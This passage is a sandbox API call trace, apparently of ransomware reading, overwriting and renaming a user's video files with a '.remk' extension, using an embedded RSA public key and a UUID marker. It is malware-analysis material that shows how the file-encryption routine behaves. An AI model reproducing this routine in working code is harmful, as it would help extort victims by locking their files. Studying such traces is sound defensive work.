dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0237.780] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0237.780] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0237.780] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0237.780] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0237.781] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0237.781] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xf3bf, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.781] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0237.782] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0237.782] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0237.782] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0237.782] CloseHandle (hObject=0x640) returned 1 [0237.787] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c78d8 [0237.787] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8c0) returned 0x37bd408 [0237.787] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c78d8 | out: hHeap=0x630000) returned 1 [0237.787] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\xB0W_x\\dcR8Wn\\MMNB3DGmP9H.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pcpks0u\\csfg h-wcbkcac\\xb0w_x\\dcr8wn\\mmnb3dgmp9h.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\xB0W_x\\dcR8Wn\\MMNB3DGmP9H.flv.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pcpks0u\\csfg h-wcbkcac\\xb0w_x\\dcr8wn\\mmnb3dgmp9h.flv.remk")) returned 1 [0237.788] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bd408 | out: hHeap=0x630000) returned 1 [0237.788] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0237.788] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0237.790] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0237.790] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x75cb88a0, ftCreationTime.dwHighDateTime=0x1d5e7a9, ftLastAccessTime.dwLowDateTime=0x5e62c960, ftLastAccessTime.dwHighDateTime=0x1d5de50, ftLastWriteTime.dwLowDateTime=0x5e62c960, ftLastWriteTime.dwHighDateTime=0x1d5de50, nFileSizeHigh=0x0, nFileSizeLow=0x1095d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WGem6pJWFmMLh_CSjVJ.swf", cAlternateFileName="WGEM6P~1.SWF")) returned 1 [0237.790] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6810 [0237.790] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xee) returned 0x3192918 [0237.790] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6810 | out: hHeap=0x630000) returned 1 [0237.790] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\xB0W_x\\dcR8Wn\\WGem6pJWFmMLh_CSjVJ.swf") returned=".swf" [0237.790] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\xB0W_x\\dcR8Wn\\WGem6pJWFmMLh_CSjVJ.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pcpks0u\\csfg h-wcbkcac\\xb0w_x\\dcr8wn\\wgem6pjwfmmlh_csjvj.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0237.790] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=67933) returned 1 [0237.790] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0237.793] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x10937, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.793] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0237.795] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0237.795] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0237.795] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0237.795] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x1095d, lpOverlapped=0x0) returned 1 [0237.796] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0237.796] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0237.797] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0237.797] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0237.797] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694fd0) returned 1 [0237.798] CryptCreateHash (in: hProv=0x694fd0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0237.798] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0237.798] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0237.798] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0237.798] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0237.798] GetLastError () returned 0x0 [0237.798] CryptDestroyHash (hHash=0x31de170) returned 1 [0237.798] CryptReleaseContext (hProv=0x694fd0, dwFlags=0x0) returned 1 [0237.798] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0237.798] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0237.798] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0237.798] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0237.798] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0237.798] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0237.798] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0237.798] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10960) returned 0x37cf820 [0237.799] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0237.799] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0237.799] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x31c0d08 [0237.799] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0237.799] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0237.799] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0237.799] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37cf408 [0237.799] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bca08 [0237.799] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37cf450 [0237.799] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bca20 [0237.799] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bca50 [0237.799] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bcab0 [0237.799] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bca68 [0237.799] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0237.799] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0237.799] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0237.799] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0237.799] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bca50 | out: hHeap=0x630000) returned 1 [0237.799] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bca68 | out: hHeap=0x630000) returned 1 [0237.800] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcab0 | out: hHeap=0x630000) returned 1 [0237.800] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0237.800] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0237.800] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bcab0 [0237.800] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fee0 [0237.800] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bca68 [0237.800] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0f28 [0237.800] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x37bca50 [0237.800] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0237.800] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0237.800] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0237.800] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0237.800] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0237.800] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0237.800] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0237.800] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0237.800] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0237.800] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bca68 | out: hHeap=0x630000) returned 1 [0237.800] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0237.800] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bca50 | out: hHeap=0x630000) returned 1 [0237.800] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0237.801] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0237.801] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcab0 | out: hHeap=0x630000) returned 1 [0237.801] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0237.801] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6990 | out: hHeap=0x630000) returned 1 [0237.801] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b88 | out: hHeap=0x630000) returned 1 [0237.801] GetCurrentThreadId () returned 0x314 [0237.801] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0237.801] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37c6cb0 [0237.801] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0237.801] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694fd0 [0237.801] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0237.801] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0237.801] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0237.801] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0237.801] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0237.801] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0237.801] GetCurrentThreadId () returned 0x314 [0237.801] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0237.801] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0237.801] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x72aea0 [0237.801] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0237.801] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0237.802] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0237.802] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0237.802] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72aea0 | out: hHeap=0x630000) returned 1 [0237.802] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x72aea0 [0237.802] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0237.802] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0237.802] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0237.802] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x319bc40 [0237.802] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0237.802] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bcab0 [0237.802] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0237.802] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0237.802] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0237.802] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0237.802] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0237.802] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0237.802] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0237.802] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0237.802] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bca50 [0237.803] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0237.803] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0237.803] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0237.803] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0237.803] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0237.803] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0237.803] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0237.803] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bca68 [0237.803] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0237.803] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0237.803] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0237.803] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bca38 [0237.803] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0237.803] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bcac8 [0237.803] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0237.803] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0237.803] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0237.803] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bca98 [0237.803] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0237.803] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bca80 [0237.804] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0237.804] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bcae0 [0237.804] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bca80 | out: hHeap=0x630000) returned 1 [0237.804] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bca80 [0237.804] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bca98 | out: hHeap=0x630000) returned 1 [0237.804] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed28 [0237.804] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0237.804] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0237.804] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0237.804] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0237.804] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bca50 | out: hHeap=0x630000) returned 1 [0237.804] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bca50 [0237.804] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0237.804] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x325fd48 [0237.804] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcab0 | out: hHeap=0x630000) returned 1 [0237.804] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6c48 [0237.804] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcae0 | out: hHeap=0x630000) returned 1 [0237.804] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x37b5b70 [0237.804] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0237.804] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x31b6580 [0237.804] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0237.804] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6e78 [0237.805] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bca50 | out: hHeap=0x630000) returned 1 [0237.805] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x37b5d88 [0237.805] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c48 | out: hHeap=0x630000) returned 1 [0237.805] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3195950 [0237.805] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0237.805] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694fd0 | out: hHeap=0x630000) returned 1 [0237.805] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72aea0 | out: hHeap=0x630000) returned 1 [0237.805] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3195950 | out: hHeap=0x630000) returned 1 [0237.805] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ea8 | out: hHeap=0x630000) returned 1 [0237.805] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6e78 | out: hHeap=0x630000) returned 1 [0237.805] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0237.805] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5d88 | out: hHeap=0x630000) returned 1 [0237.805] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b6580 | out: hHeap=0x630000) returned 1 [0237.805] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f758 | out: hHeap=0x630000) returned 1 [0237.805] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bca80 | out: hHeap=0x630000) returned 1 [0237.805] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f778 | out: hHeap=0x630000) returned 1 [0237.805] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcac8 | out: hHeap=0x630000) returned 1 [0237.806] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0237.806] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bca68 | out: hHeap=0x630000) returned 1 [0237.806] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bca38 | out: hHeap=0x630000) returned 1 [0237.806] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bddc8 | out: hHeap=0x630000) returned 1 [0237.806] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8ac8 | out: hHeap=0x630000) returned 1 [0237.806] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0237.806] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bca20 | out: hHeap=0x630000) returned 1 [0237.806] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37cf450 | out: hHeap=0x630000) returned 1 [0237.806] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fd48 | out: hHeap=0x630000) returned 1 [0237.806] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x319bc40 | out: hHeap=0x630000) returned 1 [0237.806] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5808 | out: hHeap=0x630000) returned 1 [0237.806] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0237.806] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f08 | out: hHeap=0x630000) returned 1 [0237.806] HeapFree (in: 